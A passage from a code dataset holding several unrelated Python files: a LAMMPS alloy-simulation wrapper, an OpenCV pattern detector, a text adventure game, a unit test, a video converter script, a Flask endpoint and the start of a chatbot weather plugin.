np.array(out_list)\n else :\n return out_list\n \n # Some alloy specific functions:\n def alloyify(self,*args):\n # *args : dictionaries describing alloy composition\n dataf = self.data_loc()\n N_atoms = 0\n M_types = 0\n atoms_count = 0 # Flag which section of the file contains atomic positions\n atoms_start = 0 # Starting line of Atoms block within the data file.\n masses_flag = 1\n masses_start = 0 # Starting line pf masses block within \n counts = np.zeros(len(args)) # Want to count the number of atoms of each type\n in_types = [[] for _ in range(len(args))] # Find and store the intitial atom types for each atom\n f=[] # store readlines\n line_count = 0\n with open(dataf,'r') as data_in:\n # Analyse data as it is read in for number of atoms, types, etc\n while True:\n line = data_in.readline()\n if not line: break\n f += [line]\n line_count += 1\n line = line.rstrip().split()\n if not line : continue # skip blank lines\n if '#' in line[0] : continue # skip comments\n if line[-1] == \"atoms\": N_atoms += int(line[0])\n if line[-2:] == [\"atom\",\"types\"]: M_types += int(line[0]) # Not used - should check this matches len(*args)\n if line[0] == \"Atoms\": atoms_count += 1; continue # Flag start of atomic positions listings\n if atoms_count == 1: atoms_start += line_count-1\n if line[0] == \"Masses\": masses_flag = 1; continue\n if masses_flag == 1: masses_start += line_count-1; masses_flag = 0\n if atoms_count and atoms_count<=N_atoms:\n atom_type = int(line[1])\n counts[atom_type-1] += 1\n in_types[atom_type-1] += [int(line[0])]\n atoms_count += 1\n \n # Find all the atom types suplied\n elements = {}\n for _ in args: elements.update(_)\n elements = sorted(elements.keys())\n # Create list of atom types and assigned positions according to number of atoms of each type just found\n # ... and supplied *args (dictionaries for alloy compositions)\n final_dict = {}\n for N,inds,composition in zip(counts,in_types,args):\n for key in composition: composition[key] = int(round(N*composition[key]))\n composition[max(composition)] += int(N-sum(composition.values())) # make sure all atoms are accounted for\n # Track which atom indices have yet to be assigned an element.\n unassigned_inds = set(inds)\n for el in elements:\n type_num = elements.index(el)+1 # Actually assign types by number not element\n selection = set(sample(unassigned_inds,composition.get(el,0)))\n unassigned_inds -= selection\n for i in selection: final_dict[i] = type_num\n \n # Can now write out a new data file \n self.data_file = \"alloyified_\"+self.data_file\n with open(self.data_loc(),'w') as data_out:\n for line_count,line in enumerate(f):\n if \"atom types\" in line: \n line = line.split()\n line[0] = str(len(elements))\n line = \" \".join(line)+\"\\n\"\n if line_count >= atoms_start and line_count < (atoms_start + N_atoms):\n line = line.split()\n line[1] = str(final_dict[int(line[0])])\n line = \" \".join(line)+\"\\n\"\n if line_count == masses_start: \n line = \"\\n\".join([\" \".join([str(i+1),str(element(el).mass)]) for i,el in enumerate(elements)])+\"\\n\"\n if line_count > masses_start and line_count < (masses_start + M_types):\n continue # Con't write the original masses at all\n data_out.write(line)\n\n################################ EXAMPLES #####################################\n \ndef alloy_md_properties(composition,name,*args):\n overall_comp = {}\n for sub_comp in composition: overall_comp.update(sub_comp)\n alloy_elements = \" \".join(sorted(overall_comp.keys()))\n output_properties = {}\n cubic_sc = 10\n up = 0.002 # Fractional displacements used to calculate lattice params\n # sfe/apbe calculations (very similar)\n def sfe_apbe_protocol(var):\n sfe_dir = name+\"/\"+var\n sp.call([\"mkdir\",\"-p\",sfe_dir])\n sfe_setup = Lammps.default_setup(var+\"_setup\",loc=sfe_dir)\n sfe_setup.run() # This produces a datafile elemental.data\n sfe_min = Lammps.default_setup(var+\"_min\",loc=sfe_dir)\n sfe_min.data_file = \"elemental.data\"\n if var == \"sfe\": \n sfe_min.alloyify(composition[0].copy(),composition[-1].copy())\n elif var == \"apbe\":\n sfe_min.alloyify(composition[0].copy(),composition[-1].copy(),composition[0].copy(),composition[-1].copy())\n sfe_min.update(update_dict={\"read_data\":\"alloyified_elemental.data\"},replace_dict={\"Ni Ni\":alloy_elements,\"Ni Al Ni Al\":alloy_elements})\n sfe_min.run()\n # Find the maximum displacement that will return cell to original equilibrium\n with open(sfe_min.log_loc()) as read_file:\n f = read_file.readlines()\n x_tot = float(f[-17].split()[-2])\n a = x_tot*2/np.sqrt(6) # Lattice parameter\n # Step refers to shift in upper part of supercell to calculate intrinsic stacking fault\n sfe_step = Lammps.default_setup(var+\"_step\",loc=sfe_dir)\n sfe_step.update(update_dict={\"read_data\":\"alloyified_elemental.data\",\"variable latparam1 equal\":str(a)},replace_dict={\"Ni Ni\":alloy_elements,\"Ni Al Ni Al\":alloy_elements})\n sfe_step.run()\n with open(sfe_step.log_loc()) as read_file:\n f = read_file.readlines()\n E = float(f[-2].split()[-2])\n return E\n if \"sfe\" in args:\n output_properties[\"sfe\"] = sfe_apbe_protocol(\"sfe\")\n if \"apbe\" in args:\n output_properties[\"apbe\"] = sfe_apbe_protocol(\"apbe\")\n \n # md calculations for basic properties i.e. density/lattice parameters\n if \"density\" in args or \"lattice\" in args:\n md_dir = name+\"/md\"\n sp.call([\"mkdir\",\"-p\",md_dir])\n md_setup = Lammps.default_setup(\"md_setup\",loc=md_dir)\n md_setup.run()\n md_run = Lammps.default_setup(\"md_run\",loc=md_dir)\n md_run.data_file = \"elemental.data\"\n md_run.alloyify(composition[0].copy(),composition[-1].copy())\n md_run.update(update_dict={\"read_data\":\"alloyified_elemental.data\"},replace_dict={\"Ni Al\":alloy_elements})\n md_run.run()\n dump_values = md_run.read_log(['Density', 'Temp', 'Press', 'Cella', 'Cellb', 'Cellc'])\n density = np.mean(dump_values[1,2:])\n cell_length = np.mean(dump_values[4:,2:])\n lat_param = cell_length/cubic_sc\n output_properties[\"density\"] = density\n output_properties[\"lattice\"] = lat_param\n \n # Elastic constant calculations \n if \"C11\" in args or \"C12\" in args or \"C44\" in args:\n elastic_dir = name+\"/elastic\"\n sp.call([\"mkdir\",\"-p\",elastic_dir])\n elastic_setup = Lammps.default_setup(\"elastic_setup\",loc=elastic_dir)\n if \"density\" in args or \"lattice\" in args: \n elastic_setup.update(update_dict={\"variable latparam1 equal\":str(lat_param)})\n else: cell_length = 3.52*cubic_sc # default value\n elastic_setup.run()\n # Do NVT simulations for the undisplaced supercell\n elastic_equilib = Lammps.default_setup(\"elastic_run\",loc=elastic_dir)\n elastic_equilib.data_file = \"elemental.data\"\n elastic_equilib.alloyify(composition[0].copy(),composition[-1].copy())\n elastic_equilib.update(update_dict={\"read_data\":\"alloyified_elemental.data\"},replace_dict={\"Ni Al\":alloy_elements})\n #elastic_equilib.run()\n #dump_values = elastic_equilib.read_log(['Pxx','Pyy','Pzz','Pxy','Pxz','Pyz'])\n #Pij_mean = np.mean(dump_values[1:],axis=1)\n # Now do displaced cell calculations\n directions = []\n C11 = 0 ; C12 = 0 ; C44 = 0\n if \"C11\" in args or \"C12\" in args: directions += [\"x\",\"y\",\"z\"]\n if \"C44\" in args: directions += [\"xy\",\"xz\",\"yz\"]\n all_directions = [\"x\",\"y\",\"z\",\"xy\",\"xz\",\"yz\"]\n for direction in directions:\n for displacement in [-up,up]:\n actual_disp = str(displacement*cell_length)\n change_box_cmd = direction+\" delta 0 ${delta} remap units box\" if direction in [\"x\",\"y\",\"z\"] else direction+\" delta ${delta} remap units box\"\n current_run = Lammps.based_on_setup(elastic_equilib,direction+str(up)+\".in\",update_dict={\"variable delta equal\":actual_disp,\"change_box all\": change_box_cmd})\n current_run.run()\n dump_values = current_run.read_log(['Pxx','Pyy','Pzz','Pxy','Pxz','Pyz'])\n Pij = np.mean(dump_values[1:],axis=1)\n a = all_directions.index(direction) # Voigt index\n if a < 3: \n C11 -= Pij[a]/(6*displacement)\n C12 -= Pij[(a+1)%3]/(12*displacement) + Pij[(a+2)%3]/(12*displacement)\n if a >= 3:\n C44 -= Pij[a]/(6*displacement)\n if \"C11\" in args: output_properties[\"C11\"] = C11*1e-4\n if \"C12\" in args: output_properties[\"C12\"] = C12*1e-4\n if \"C44\" in args: output_properties[\"C44\"] = C44*1e-4\n \n return tuple(output_properties[key] for key in args)","sub_path":"python-lammps/simple_lammps_wrapper.py","file_name":"simple_lammps_wrapper.py","file_ext":"py","file_size_in_byte":20530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"310974646","text":"#!/usr/bin/env python\nimport ecto\nfrom ecto_opencv import highgui, calib, imgproc\n\nplasm = ecto.Plasm()\nsched = ecto.schedulers.Threadpool(plasm)\n\nvideo_cap = highgui.VideoCapture(video_device=0)\nfps = highgui.FPSDrawer()\nrgb2gray = imgproc.cvtColor('rgb -> gray', flag=7)\n\ndisplay_strand = ecto.Strand()\n\nchecker_detector = calib.PatternDetector('Checker Detector',\n rows=5, cols=4,\n pattern_type=\"chessboard\",\n square_size=0.03)\ncircle_detector = calib.PatternDetector('Dot Detector',\n rows=7, cols=3, pattern_type=\"acircles\",\n square_size=0.03)\ncircle_drawer = calib.PatternDrawer('Circle Draw',\n rows=7, cols=3)\nchecker_drawer = calib.PatternDrawer('Checker Draw',\n rows=5, cols=4)\ncircle_display = highgui.imshow('Pattern show',\n name='Pattern', waitKey= 2, maximize=True,\n strand=display_strand)\n\nplasm.connect(video_cap['image'] >> circle_drawer['input'],\n circle_drawer['out'] >> checker_drawer['input'],\n checker_drawer['out'] >> fps['image'],\n fps['image'] >> circle_display['input'],\n video_cap['image'] >> rgb2gray['input'],\n rgb2gray['out'] >> (circle_detector['input'], checker_detector['input']),\n circle_detector['out', 'found'] >> circle_drawer['points', 'found'],\n checker_detector['out', 'found'] >> checker_drawer['points', 'found'],\n )\n\necto.view_plasm(plasm)\nsched.execute()\n","sub_path":"samples/building_up_a_pose_estimator/example_05.py","file_name":"example_05.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"394752006","text":"from room import Room\nfrom player import Player\nfrom item import Item\nfrom item import Herb\nimport sys\nimport os\nimport cmd\nimport textwrap\nimport time\nimport random\n\n#### Map ####\n\"\"\"\n____________________________________________________________\n ===================\n | TREASURE |\n | |\n | [_-__-_] |\n | |\n |====== =======|\n +_+_+_+_+_+_+_+_+_+_+ { }\n | | | |\n | OVERLOOK | | |\n | | | |\n |_______ _________| ____{ }___\n __| |____ / \\\n | |_________| NARROW |\n | FOYER _________ |\n |___ ___| |______________/\n | |\n__________________| |_____________________________________\n\n OUTSIDE \n\n\"\"\"\n# zonemap = {\n# 'foyer': {\n# ZONENAME: '',\n# DESCRIPTION: 'description',\n# EXAMINATION: 'examine',\n# SOLVED: False,\n# UP: 'up', 'north',\n# DOWN: 'down', 'south',\n# LEFT: 'left', 'west',\n# RIGHT: 'right', 'east'\n# }\n# }\n# Declare all the rooms\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\",\n \"You see the sun set, and this beauty is bitter sweet. Unscramble this word ==> `lusunec`\",\n \"False\",\n 'foyer',\n \"False\",\n \"False\",\n \"False\",\n [Item(\"Red Stone\", \"Illuminates a red hue when held to light.\"), \n Item(\"Demon Skull\", \"It makes a faint humming sound.\"),\n Herb(\"Healing Leaf\", \"A minty tasting leaf\", 25, \"Herb\")\n ]\n ),\n\n 'foyer': Room(\"Foyer\",\n \"\"\"Dim light filters in from the south. Dusty\n passages run north and east.\"\"\",\n 'You hear the cries of tortured people.\\nThey eagerly would like to know what `avogadros number` is. (4 sig figs)',\n \"False\",\n 'overlook',\n 'outside',\n \"False\",\n 'narrow',\n []\n ),\n\n 'overlook': Room(\"Grand Overlook\",\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\",\n \"The door has locked behind you.\\nAnother tortured scientist appears and asks:\\nWhat is π/2 radians in degrees?\",\n \"False\",\n \"False\",\n 'foyer',\n \"False\",\n \"False\",\n []\n),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\",\n \"Ancient writing teaches you the code combination `1337`\",\n \"False\",\n 'treasure',\n \"False\",\n 'foyer',\n \"False\",\n []\n),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber. Leroy Jenkins stands before you,\\nand he looks hungry and ready to rap.\\nIf you answer his riddle, he will give you his WoW account information.\"\"\",\n \"Your palms are sweaty, knees weak, mom's spaghetti. The cake is a lie,\\nbecause Leroy Jenkins ate it with what kind of food?\",\n \"True\",\n \"False\",\n 'narrow',\n \"False\",\n \"False\",\n []\n),\n}\n\n\n# Link rooms together\n\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\nstarting_knight = [\n Item(\"Steel Sword\", \"Something To Slice With.\"), \n Item(\"Lions Mane\", \"Increases Health Slightly\")\n]\n\nstarting_magi = [\n Item(\"Magic Spell Book\", \"Provides Knowledge Of Ancient Spells\"), \n Item(\"Lions Mane\", \"Increases Health Slightly\")\n]\n\nstarting_assassin = [\n Item(\"Steel Dagger\", \"Something To Stab With.\"), \n Item(\"Lions Mane\", \"Increases Health Slightly\")\n]\n\n\n#\n# Main\n#\ndef main():\n print(os.getenv)\n os.system('clear')\n print(\"#########################################\\n\")\n print(\"# Welcome To Troy's Text Adventure Game #\\n\")\n print(\"#########################################\\n\")\n print(\"# 1.) Start # \")\n print(\"# 2.) Load # \")\n print(\"# 3.) Help # \")\n print(\"# 4.) Exit # \")\n print(\"#########################################\\n\")\n option = input(\"-> \")\n if option == \"1\":\n start()\n elif option == \"2\":\n pass\n elif option == \"3\":\n help_menu()\n elif option == \"4\":\n sys.exit()\n\n else:\n print(\"Requires 1, 2, or 3 inputs\")\n main()\n\ndef help_menu():\n \n print(\"#########################################\\n\")\n print(\"# Welcome To Troy's Text Adventure Game #\\n\")\n print(\"#########################################\\n\")\n print(\"# type 1, 2, 3, 4 for menu navigation\\n \")\n print(\"# - Use `up`, `down`, `left`, `right` to move\\n \")\n print(\"# - Type The Following Commands For Actions:\\n['quit', 'q']\\n['move', 'go', 'travel', 'walk']\\n['examine', 'inspect', 'interact', 'look']\\n['inventory', 'items']\\n[drop, get]\\n[search, heal] \")\n print(\"# - Use 'examine' to examine something\\n \")\n print(\"# - Good Luck Adventurer. \")\n print(\"#########################################\\n\")\n main()\n\n\ndef class_define(player_name):\n print(\"Which Class Would You Like To Be {}: \".format(player_name))\n print(\"1.) Knight\")\n print(\"2.) Magi\")\n print(\"3.) Assassin\")\n \n\n player_class = input('Class: \\n').upper()\n if player_class == \"1\" or player_class == \"KNIGHT\":\n global starting_knight\n default_inventory = starting_knight\n class_name = \"Knight\"\n elif player_class == \"2\" or player_class == \"MAGI\":\n global starting_magi\n default_inventory = starting_magi\n class_name = \"Magi\"\n elif player_class == \"3\" or player_class == \"ASSASSIN\":\n global starting_assassin\n default_inventory = starting_assassin\n class_name = \"Assassin\"\n else:\n print(\"Requires 1, 2, or 3 inputs or specify as `knight`, `magi`, or `assassin`\\n\")\n class_define(player_name)\n \n default_location = room['outside']\n \n global PlayerIG\n PlayerIG = Player(player_name, default_location, default_inventory)\n start1(class_name)\n\ndef start():\n os.system('clear')\n print(\"Hello, what is your name?\")\n global room\n # print(room['outside'])\n options = input('-->')\n\n class_define(options)\n\n\n### Game Interactivity ###\ndef print_location():\n print('\\n' + ('#' * (4 + len(PlayerIG.current_room.name))))\n print('# ' + PlayerIG.current_room.name.upper() + ' #')\n print('# ' + PlayerIG.current_room.description + ' #')\n print('' + ('#' * (4 + len(PlayerIG.current_room.name))))\n\n\n#### Game Functionality ####\n\n\ndef player_move(myAction):\n ask = \"What direction would you like to {} to?\\n\".format(myAction)\n print(' ____________________________________________________________')\n print(' =================== ')\n print(' | TREASURE | ')\n print(' | | ')\n print(' | [_-__-_] | ')\n print(' | | ')\n print(' |====== =======| ')\n print(' +_+_+_+_+_+_+_+_+_+_+ { } ')\n print(' | | | | ')\n print(' | OVERLOOK | | | ')\n print(' | | | | ')\n print(' |_______ _________| ____{ }___ ')\n print(' __| |____ / | ')\n print(' | |_________| NARROW | ')\n print(' | FOYER _________ | ')\n print(' |___ ___| |______________/ ')\n print(' | | ')\n print('__________________| |_____________________________________ ')\n print(' ')\n print(' OUTSIDE ')\n\n dest = input(ask)\n if dest in ['up', 'north']:\n destination = room[PlayerIG.current_room.up]\n print(destination)\n movement_handler(destination)\n elif dest in ['down', 'south', 'd', 's']:\n destination = room[PlayerIG.current_room.down]\n movement_handler(destination)\n elif dest in ['left', 'west', 'l', 'w']:\n destination = room[PlayerIG.current_room.left]\n movement_handler(destination)\n elif dest in ['right', 'east', 'r', 'e']:\n destination = room[PlayerIG.current_room.right]\n movement_handler(destination)\n\ndef movement_handler(destination):\n print(\"\\n\" + \"You are in the \" + destination.name)\n try:\n PlayerIG.current_room = destination\n print_location()\n print(\"\\n\" + \"======================================\")\n print(\"What would you like to do?\")\n action = input(\"--->\" + \"\\n\")\n acceptable_actions = ['move', 'go', 'travel', 'walk', 'quit', 'q', 'examine', 'inspect', 'interact', 'look', 'inventory', 'items', 'drop', 'get', 'search', 'heal']\n while action.lower() not in acceptable_actions:\n print(\"Unknown Action, Try Again.\\n try 'move', 'go', 'travel', 'walk'\")\n action = input(\"-->\")\n if action.lower() in ['quit', 'q']:\n sys.exit()\n \n elif action.lower() in ['move', 'go', 'travel', 'walk']:\n if PlayerIG.current_room.solved == \"False\":\n print(\"\\n### Please `examine` Your Surroundings ###\")\n movement_handler(destination)\n else:\n player_move(action.lower())\n elif action.lower() in ['examine', 'inspect', 'interact', 'look']:\n player_examine(action.lower())\n elif action.lower() in ['inventory', 'items']:\n player_items(action.lower())\n elif action.lower() in ['drop']:\n player_drop()\n elif action.lower() in ['get']:\n player_get()\n elif action.lower() in ['search']:\n player_search()\n elif action.lower() in ['heal']:\n Herb.recover(PlayerIG)\n movement_handler(destination)\n\n except: \n if action.lower() in ['move', 'go', 'travel', 'walk']:\n print(\"You Can't Go That Way, follow the clues.\")\n player_move(myAction='move')\n else:\n sys.exit()\n \n\ndef start1(x):\n os.system('clear')\n # print_location()\n print(\"Hello {} {},\\nyou have been chosen to infiltrate and retrieve \\nan `item` of great power.\".format(x ,PlayerIG.name))\n print(\"\\n\" + \"======================================\")\n destination = PlayerIG.current_room\n movement_handler(destination)\n # print(\"What would you like to do?\")\n # action = input(\"--->\")\n # acceptable_actions = ['move', 'go', 'travel', 'walk', 'quit', 'examine', 'inspect', 'interact', 'look']\n # while action.lower() not in acceptable_actions:\n # print(\"Unknown Action, Try Again.\\n\")\n # action = input(\"-->\")\n # if action.lower() == 'quit':\n # sys.exit()\n # elif action.lower() in ['move', 'go', 'travel', 'walk']:\n # player_move(action.lower())\n # elif action.lower() in ['examine', 'inspect', 'interact', 'look']:\n # player_examine(action.lower())\n\ndef player_search():\n destination = PlayerIG.current_room\n print(\"You search the room.\")\n print(\"These items are spotted: \")\n print(PlayerIG.current_room.items)\n movement_handler(destination)\n\ndef player_get():\n destination = PlayerIG.current_room\n print(\"You search the room.\")\n print(\"These items are spotted: \")\n print(PlayerIG.current_room.items)\n item = input('input item you would like to pick up -->')\n room_items = PlayerIG.current_room.items\n print(room_items[0].name)\n print([i.name for i in room_items])\n if any([i.name == item for i in room_items]):\n match = next((l for l in room_items if l.name == item), None)\n # print(match)\n PlayerIG.inventory.append(match)\n print(PlayerIG.inventory)\n PlayerIG.current_room.items.remove(match)\n # PlayerIG.currentRoom.items.remove(match)\n movement_handler(destination)\n else:\n print(f\"There is no item with the name of {item}\")\n movement_handler(destination)\n\ndef player_drop():\n destination = PlayerIG.current_room\n item = input('input item you would like to drop -->')\n items = PlayerIG.inventory\n if any([i.name == item for i in items]):\n match = next((l for l in items if l.name == item), None)\n print(match)\n PlayerIG.inventory.remove(match)\n PlayerIG.current_room.items.append(match)\n print(\"Your Inventory: \", PlayerIG.inventory)\n print(\"Items In Room: \", PlayerIG.current_room.items)\n movement_handler(destination)\n else: \n print(f\"There is no item with the name of {item} in your inventory\")\n movement_handler(destination)\n\ndef player_items(item):\n destination = PlayerIG.current_room\n print(\"These are your items...\\n\")\n print(PlayerIG.inventory)\n movement_handler(destination)\n\ndef player_examine(action):\n destination = PlayerIG.current_room\n print(PlayerIG.current_room.name)\n\n### Outside Cave Entrance EXAMINE PUZZLE ###\n\n if PlayerIG.current_room.name == 'Outside Cave Entrance':\n if PlayerIG.current_room.solved == True:\n print(\"You have already exhausted this zone\")\n movement_handler(destination)\n else:\n print('# ' + PlayerIG.current_room.examination + ' #')\n word = input('->')\n if word == 'nucleus':\n PlayerIG.current_room.solved = True\n print(PlayerIG.current_room.solved)\n print(\"\\nGreat Job, the word is `nucleus`, You May Move North.\")\n\n movement_handler(destination)\n else:\n print(\"Wrong, Try Again\")\n print(action)\n player_examine(action)\n\n### Foyer EXAMINE PUZZLE ###\n\n if PlayerIG.current_room.name == 'Foyer':\n if PlayerIG.current_room.solved == True:\n print(\"You have already exhausted this zone\")\n movement_handler(destination)\n else:\n print('# ' + PlayerIG.current_room.examination + ' #')\n word = input('->')\n if word == '6.022*10**23' or word == '6.022x10^23':\n PlayerIG.current_room.solved = True\n print(PlayerIG.current_room.solved)\n print(\"\\nGreat Job, the tortured scientists rejoice, and laugh at you.\\nThey unlock various passageways.\")\n\n movement_handler(destination)\n else:\n print(\"Wrong, Try Again\")\n print(action)\n player_examine(action)\n\n### Grand Overlook EXAMINE PUZZLE ###\n\n if PlayerIG.current_room.name == 'Grand Overlook':\n if PlayerIG.current_room.solved == True:\n print(\"You have already exhausted this zone\")\n movement_handler(destination)\n else:\n print('# ' + PlayerIG.current_room.examination + ' #')\n word = input('->')\n if word == '90' or word == '90 degrees':\n PlayerIG.current_room.solved = True\n print(PlayerIG.current_room.solved)\n print(\"\\nGreat Job, the scientist realizes the meaning of his bald circular 2πr shaped head.\\nThe door has now unlocked behind you.\")\n\n movement_handler(destination)\n else:\n print(\"Wrong, Try Again\")\n print(action)\n player_examine(action)\n\n### Narrow Passage EXAMINE PUZZLE ###\n\n if PlayerIG.current_room.name == 'Narrow Passage':\n if PlayerIG.current_room.solved == True:\n print(\"You have already exhausted this zone\")\n movement_handler(destination)\n else:\n print('# ' + PlayerIG.current_room.examination + ' #')\n word = input('->')\n if word == '1337':\n PlayerIG.current_room.solved = True\n print(PlayerIG.current_room.solved)\n print(\"\\nGreat Job, but you aren't elite just yet, the next puzzle awaits.\")\n\n movement_handler(destination)\n else:\n print(\"Wrong, Try Again\")\n print(action)\n player_examine(action)\n\n### Treasure Chamber EXAMINE PUZZLE ###\n\n if PlayerIG.current_room.name == 'Treasure Chamber' and room['outside'].solved == True and room['foyer'].solved == True and room['overlook'].solved == True and room['narrow'].solved == True:\n if PlayerIG.current_room.solved == False:\n print(\"You have already exhausted this zone, you won now go home.\")\n elif room['outside'].solved == True and room['foyer'].solved == True and room['overlook'].solved == True and room['narrow'].solved == True:\n print('# ' + PlayerIG.current_room.examination + ' #')\n word = input('->')\n if word == 'chicken':\n PlayerIG.current_room.solved = False\n # print(PlayerIG.current_room.solved)\n print(\"\\nYou Have Won The Game, gratz.\\nYou proceed to play World of Warcraft with Leroy for 2 months straight.\\n At Least You Had Chicken.\")\n\n \n else:\n print(\"Wrong, Try Again\")\n print(action)\n player_examine(action)\n else:\n print(\"\\n### More Rooms Need Examining/Solving.. Chum ###\")\n movement_handler(destination)\n\n\n\nZONENAME = ''\nDESCRIPTION = 'description'\nEXAMINATION = 'examine'\nSOLVED = False\nUP = 'up', 'north'\nDOWN = 'down', 'south'\nLEFT = 'left', 'west'\nRIGHT = 'right', 'east'\n\nsolved_places = {'outside': False, \n 'foyer': False, \n 'overlook': False, \n 'narrow': False, \n 'treasure': False\n}\n\n\nmain()\n# Make a new player object that is currently in the 'outside' room.\n\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":19976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"439482421","text":"import unittest\nfrom unittest.mock import patch\n\nfrom getnet.services.base import ResponseList\nfrom getnet.services.customers import Service, Customer\nfrom tests.getnet.services.customers.test_customer import sample\n\n\n@patch(\"getnet.Client\")\nclass ServiceTest(unittest.TestCase):\n def setUp(self) -> None:\n data = sample.copy()\n data[\"status\"] = \"active\"\n self.sample = data\n\n def testCreate(self, client_mock):\n client_mock.post.return_value = self.sample\n\n service = Service(client_mock)\n customer = service.create(Customer(**sample))\n\n self.assertIsInstance(customer, Customer)\n self.assertEqual(sample.get(\"customer_id\"), customer.customer_id)\n\n def testAll(self, client_mock):\n client_mock.get.return_value = {\n \"customers\": [self.sample, self.sample, self.sample],\n \"page\": 1,\n \"limit\": 100,\n \"total\": 3,\n }\n\n service = Service(client_mock)\n customers = service.all()\n\n self.assertIsInstance(customers, ResponseList)\n self.assertEqual(1, customers.page)\n self.assertEqual(3, customers.total)\n self.assertEqual(sample.get(\"customer_id\"), customers[0].customer_id)\n\n def testGet(self, client_mock):\n client_mock.get.return_value = self.sample\n\n service = Service(client_mock)\n customer = service.get(sample.get(\"customer_id\"))\n\n self.assertIsInstance(customer, Customer)\n self.assertEqual(sample.get(\"customer_id\"), customer.customer_id)\n client_mock.get.assert_called_once_with(\n \"/v1/customers/{}\".format(sample.get(\"customer_id\"))\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/getnet/services/customers/test_service.py","file_name":"test_service.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"65502848","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Copyright 2020 by Murray Altheim. All rights reserved. This file is part of\n# the Robot Operating System project and is released under the \"Apache Licence, \n# Version 2.0\". Please see the LICENSE file included as part of this package.\n#\n# author: Murray Altheim\n# created: 2020-08-19\n# modified: 2020-08-19\n# \n# A simple script that converts an h264 to mp4 video file using ffmpeg, which\n# must already be installed.\n#\n\nimport os, sys\nfrom colorama import init, Fore, Style\ninit()\n\nif len(sys.argv) != 2:\n print(Fore.RED + 'ERROR: expected 1 command line argument: path to h264 source file.' + Style.RESET_ALL)\n sys.exit(1)\n \n#print('number of arguments: {:d} arguments.'.format(len(sys.argv)))\n#print('argument List: {}'.format(str(sys.argv)))\n\nh264_filename = sys.argv[1]\nif not os.path.isfile(h264_filename):\n print(Fore.RED + 'ERROR: source file {} does not exist.'.format(h264_filename) + Style.RESET_ALL)\n sys.exit(1)\nprint(Fore.CYAN + Style.DIM + '-- source file: {}'.format(h264_filename) + Style.RESET_ALL)\n\nbasename, ext = os.path.splitext(h264_filename)\nmp4_filename = basename + '.mp4'\n\nif os.path.isfile(mp4_filename):\n print(Fore.RED + 'ERROR: target file {} already exists.'.format(mp4_filename) + Style.RESET_ALL)\n sys.exit(1)\nprint(Fore.CYAN + Style.DIM + '-- target file: {}'.format(mp4_filename) + Style.RESET_ALL)\n\nprint(Fore.GREEN + Style.BRIGHT + '-- converting {}...'.format(h264_filename) + Style.RESET_ALL)\n#ffmpeg -loglevel panic -hide_banner -r 24 -i $h264_filename -vcodec copy $mp4_filename \nos.system('ffmpeg -loglevel info -hide_banner -r 24 -i ' + h264_filename + ' -vcodec copy ' + mp4_filename )\n\nprint(Fore.CYAN + '-- complete: wrote to target file: {}'.format(mp4_filename) + Style.RESET_ALL)\n\n#EOF\n","sub_path":"h264_to_mp4.py","file_name":"h264_to_mp4.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"488466468","text":"__author__ = 'caravan4eg'\n\nfrom flask import Flask\nfrom werkzeug.routing import BaseConverter\nimport os, json\n\n\napp = Flask(__name__)\n\n@app.route('/locales')\ndef index():\n\t# Возвращает локали\n\n\tloc = {\"ru\": \"Russian\", \"en\": \"English\", \"it\": \"Italian\"}\n\tlocales = json.dumps(loc, indent=4)\n\n\tprint('User requests locales:', locales)\n\t\n\treturn locales, 200\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"hw 10 -1 GET locales.py","file_name":"hw 10 -1 GET locales.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"302710399","text":"from nonebot import on_command, CommandSession\nfrom nonebot import on_natural_language, NLPSession, IntentCommand\nfrom jieba import posseg\n\nfrom .data_source import get_weather_of_city\n\n__plugin_name__ = '天气'\n__plugin_usage__ = r\"\"\"\n天气查询\n天气 [城市名称]\n\"\"\"\n\n\n@on_command('weather', aliases=('天气', '天气预报', '查天气'))\nasync def weather(session: CommandSession):\n city = session.current_arg_text.strip()\n if not city:\n city = (await session.aget(prompt='你想查询哪个城市的天气呢?')).strip()\n while not city:\n city = (await session.aget(prompt='要查询的城市名称不能为空呢,请重新输入')).strip()\n weather_report = await get_weather_of_city(city)\n await session.send(weather_report)\n\n\n# on_natural_language 装饰器将函数声明为一个自然语言处理器\n# keywords 表示需要响应的关键词,类型为任意可迭代对象,元素类型为 str\n# 如果不传入 keywords,则响应所有没有被当作命令处理的消息\n@on_natural_language(keywords={'天气'})\nasync def _(session: NLPSession):\n # 去掉消息首尾的空白符\n stripped_msg = session.msg_text.strip()\n # 对消息进行分词和词性标注\n words = posseg.lcut(stripped_msg)\n\n city = None\n # 遍历 posseg.lcut 返回的列表\n for word in words:\n # 每个元素是一个 pair 对象,包含 word 和 flag 